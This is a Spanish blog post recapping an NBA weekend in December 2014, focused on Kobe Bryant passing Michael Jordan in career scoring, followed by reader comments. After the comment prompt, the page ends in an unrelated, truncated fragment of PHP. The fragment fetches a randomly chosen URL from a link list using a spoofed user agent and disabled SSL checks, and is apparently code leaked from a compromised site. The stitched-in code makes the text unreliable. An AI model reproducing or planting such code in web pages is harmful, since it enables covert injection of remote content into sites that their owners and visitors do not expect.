Informe del fin de semana: Bryant, for the eternity… ¡Yeees!

15 de December de 2014 por TheDeerHunter

Kobe Bryant ya es el tercer máximo anotador de todos los tiempos tras superar a Michael Jordan. “Superar a Michael Jordan” parece un oxímoron, una contradicción evidente, ya que de todos es sabido que el ex jugador de los Bulls era una auténtica bestia competitiva en todos los aspectos. Por eso, solo otras bestias cercanas a su nivel pueden ni siquiera soñar con superarle. Hoy todo el protagonismo será (y ha de ser) para Kobe Bryant pero  el resto de la liga también se merece un repaso a su fin de semana.

Comenzaba el show el viernes con un Blazers@Bulls de los de no apartar el ojo de la pantalla. Se oteaba demolición por  parte de LaMarcus Aldridge, pero…

“Impresionante Mirotic en el final del 1Q y el principio del segundo” Mamba_blanca

Los hombres de Thibodeau aguantaban el chaparrón con la irrupción de Nikola Mirotic y terminaban llevándose el gato al agua con el primer partido de Derrick Rose por encima de los 30 puntos desde 2012.

De hecho, el viernes fue una noche de rachas rotas: los Clippers se dejaban la suya (9 victorias) en plaza complicada como es el Verizon Center de Washington y en cambio, los Knicks conseguían una victoria en el Garden que finiquitaba la suya de 10 derrotas consecutivas.

Los Cleveland sumaron su segunda derrota seguida a pesar de contar de nuevo con Lebron James y disputar éste un enorme partido. A pesar de contar con sólo 7 minutos de Anthony Davis por un golpe en el pecho, los Pelicans se comían a uno de los equipos más en forma de la liga. Tyreke Evans y Ryan Anderson fueron claves.

En el resto de la jornada los Sixers se quedaban en 70 puntos en Brooklyn para dar aire al necesitado equipo local en el que destacó un gran Mason Plumlee, como señalásteis;  Louis Williams continuó su recital en la victoria de Raptors ante Indiana; Los Grizzlies necesitaron dos prórrogas para doblegar a los Hornets; los Heat lograron una apurada victoria en Salt Lake City gracias al partidazo de Dwyane Wade, y Russell Westbrook fue demasiado para los Wolves en un discreto partido de Durantula (Steve Adams debería haber dejado grabando el partido en que fue mejor que KD). Y que no se pase:

Las musas han hablado, Jodie Meeks debuta, los Pistons ganan (En Phoenix)” Ruxixón.

Para finiquitar el viernes tenemos al gran Swaggy P!! (AKA I.D.M = I Dont Miss). Menudo solo de guitarra se marcó Nick Young en casa de los campeones, incluido un winner como una casa en la cara de Manudo. Bastante puntito de tocada de pelotas hacia su jefe de filas, Kobe Bryant, que tenía opciones de superar a Jordan en el acumulado histórico de anotación. No pudo ser y el bueno de Young no pudo evitar meter un poco de dedo en la yaga en la entrevista post-partido. Cosas de la genialidad…

“Venía para otorgar a la chufla de Nick Young el premio a momentazo del fin de semana hasta que me he encontrado con esto https://vine.co/v/O6gV7hJvirX No puedo dejar de verlo” Rumbero

¿Cuantos pasos hace Corey Brewer? ¿4, 5 o 23?

El sábado lo más destacado fue la nueva victoria de los Warriors…

“En juego Warriors @ Mavs. Los primeros 6 minutos están siendo un compendio de por qué GSW son ahora mismo el mejor equipo del planeta.” TJNBA.COM

Al final bajaron el pie del acelerador y el marcador pareció reflejar un partido disputado que no lo fue tanto. El equipo de Steve Kerr está hoy por hoy un escalón por encima de todos. Los Grizzlies, únicos capaces de aguantarles algo el paso, por un pelo no perdieron en la cancha del peor equipo de la liga. Otra vez prórroga y milagro en forma de Mike Conley MVP:

“Vaya partido perdieron los 76ers,de 18 iban ganando a 8 minutos para el final,a todo unos Grizzlies.32 puntos en ese periodo,con triple de Conley para forzar la prórroga y ganar el partido en la misma.Y por último,las musas siguen hablando,Meeks segundo partido que juega y Detroit van 2-0 con él. Dinastía.” Ruxixón

Como comentó Ruxixón nuestro ídolo particular Jodie Meeks mantiene su imbatibilidad y los Pistons ganaron en Sacramento.

Poco después saltaba una de las mayores sorpresas del fin de semana:

Tobias Harris sumando millones a su próximo contrato a ritmo de buzzer beater para que Orlando finiquite la racha de 9 victorias seguidas de los Hawks.” Ruxixon

Ciertamente no esperábamos que Orlando rompiera esta racha con la pájara que les había entrado las últimas semanas. No te puedes confiar en esta competición y un apagón inexplicable de los halcones en el 2º cuarto llevó el partido al limbo. El arranque de potencia de Tobias es demoledor. Orlando se coloca como el principal candidato a zona de playoffs de su conferencia.

En el resto de la jornada los metamorfoseados Nets (con Karasev, Cory Jefferson y Plumlee de titulares) ganaron en Charlotte; los Blazers se quitaron la espina en Indianapolis; los Clippers firmaron su segunda derrota seguida en la cada día más difícil cancha de los Bucks (Fear the Deer), y los Rockets si sumaron su victoria ante Denver, con triple doble de James Harden y la vuelta de Dwight Howard.

Como ya hemos comentado la jornada de ayer domingo queda eclipsada por la marca de anotación de Kobe Bryant. Es tan importante la efeméride (superar a Jordan en algo no pasa todos los días) que ya hemos publicado un artículo especial. Lo consiguió a domicilio frente los Wolves en un partido resuelto en los últimos instantes a favor de los angelinos.

Si apartamos la vista un poco de los focos, comprobaremos que los Warriors ganaron su décimosexto partido seguido, este ante los Pelicans que les exigieron el máximo a pesar de no contar con Anthony Davis. Wizards y Bulls mantienen el paso firme gracias a sus victorias frente Utah y Miami, respectivamente, pero no pudieron acercarse a los Raptors en la clasificación porque estos vencieron en el Madison Square Garden en la prórroga gracias a un Kyle Lowry que había perdido 9 balones durante el tiempo regular.

Los Thunder arrasaron a los Suns y mandaron un mensaje muy contundente a la liga con su sexta victoria consecutiva: llegarán a playoffs y tal vez más fuerte mentalmente que nunca. Los Spurs, que ayer consiguieron una vestigio de prestigio en Denver de la mano de un Kawhi Leonard total (18 pts, 8 rbs, 4 ast, 5 robos, 6 tap), seguro que fueron de los que captaron el mensaje.

Comenta

4 comentarios a esta entrada

  1. Cocinitas1 dice:
    #1

    No es el mayor anotador, es el 3º.

      Citar

  2. txusma dice:
    #2

    Claro, claro…

    Corregido. Gracias por el aviso.

      Citar

  3. Azabel dice:
    #3

    imparables los warriors y casi sin lee y con poco de bogutm, cuando esten todos agarrense

      Citar

  4. Txusma dice:
    #4

    Azabel:
    imparables los warriors y casi sin lee y con poco de bogutm, cuando esten todos agarrense

    A lo mejor están imparables pq juegan sin Lee…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>